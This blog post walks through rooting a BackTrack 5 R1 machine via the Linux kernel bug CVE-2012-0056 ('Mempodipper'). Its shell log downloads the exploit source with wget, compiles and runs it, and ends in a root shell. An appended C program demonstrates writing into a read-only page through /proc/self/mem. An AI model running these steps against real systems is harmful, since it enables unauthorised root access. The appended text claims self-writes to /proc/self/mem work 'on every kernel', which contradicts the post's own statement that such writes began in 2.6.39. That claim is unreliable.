Backtrack 5 kernel whoops !!



If you run BackTrack 5 R1 (kernel 2.6.39.4) as a non-root user, you can get root through CVE-2012-0056, the /proc/<pid>/mem write bug that zx2c4 named "Mempodipper". It is not BackTrack-specific: the kernel started allowing writes to /proc/<pid>/mem in 2.6.39, and every release from there up to the fix in 3.2.2 (plus the stable series that picked the fix up) is affected, so any of those kernels with a setuid-root binary such as su can be exploited the same way. Read the write-up at http://blog.zx2c4.com. The exploit code is on exploit-db as "Linux Local Privilege Escalation via SUID /proc/pid/mem Write": http://www.exploit-db.com/exploits/18411/

chalo@bt:~$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
root
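The mechanism behind the "Assigning fd 5 to stderr" and "Seeking to offset" lines above is a write through /proc/<pid>/mem: the exploit seeks the descriptor to an address inside su's own code and lets whatever su prints to stderr land there. The C program below is an added example, not part of the original post or of mempodipper.c. It shows the primitive against the calling process only (no setuid binary involved): a write through /proc/self/mem succeeds even on a page the process has mapped read-only, which is what makes patching a code page possible. All function names in it are the example's own.

```c
// Added example (not from the original post or from mempodipper.c):
// a write through /proc/self/mem into a page the process mapped read-only.
// The kernel services mem-file writes through its "forced" access path,
// so page protections that would stop a normal store do not stop this.
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Write len bytes at a virtual address of the current process by pwrite()ing
 * to /proc/self/mem at that offset (the file offset is the virtual address,
 * which is what the exploit's "Seeking to offset" step sets up).
 * Returns 0 on success, -1 on failure. */
static int poke_via_proc_mem(void *addr, const void *buf, size_t len)
{
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return -1;
    ssize_t n = pwrite(fd, buf, len, (off_t)(uintptr_t)addr);
    close(fd);
    return (n == (ssize_t)len) ? 0 : -1;
}

/* Map a page, fill it, make it read-only, then overwrite it through
 * /proc/self/mem. Returns 1 if the read-only page changed, 0 if the write
 * was refused or had no effect, -1 on setup error. */
int demo_write_readonly_page(void)
{
    long pagesz = sysconf(_SC_PAGESIZE);
    char *page = mmap(NULL, pagesz, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    strcpy(page, "original");
    if (mprotect(page, pagesz, PROT_READ) != 0) {
        munmap(page, pagesz);
        return -1;
    }

    /* A direct store to `page` here would SIGSEGV; the mem file ignores
     * the read-only mapping and writes anyway. */
    const char payload[] = "patched!";
    int rc = poke_via_proc_mem(page, payload, sizeof payload);
    int changed = (rc == 0 && strcmp(page, "patched!") == 0);
    munmap(page, pagesz);
    return changed;
}

int main(void)
{
    int r = demo_write_readonly_page();
    printf("/proc/self/mem write into read-only page: %s\n",
           r == 1 ? "succeeded" : "failed");
    return r == 1 ? 0 : 1;
}
```

Build with `gcc -o memwrite memwrite.c` and run as an ordinary user; self-access to /proc/self/mem is permitted on every kernel, so the read-only page is overwritten. What CVE-2012-0056 added on top of this primitive was the ability to keep such a descriptor valid across the exec of a setuid binary, turning the binary's own stderr output into the write.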


3 Responses to Backtrack 5 kernel whoops !!

  1. G1 says:

    Hey – I noticed your posting. I created a proof of concept video on this.

  2. Aircrack Ng says:

    Great video, Johnny. Thanks.
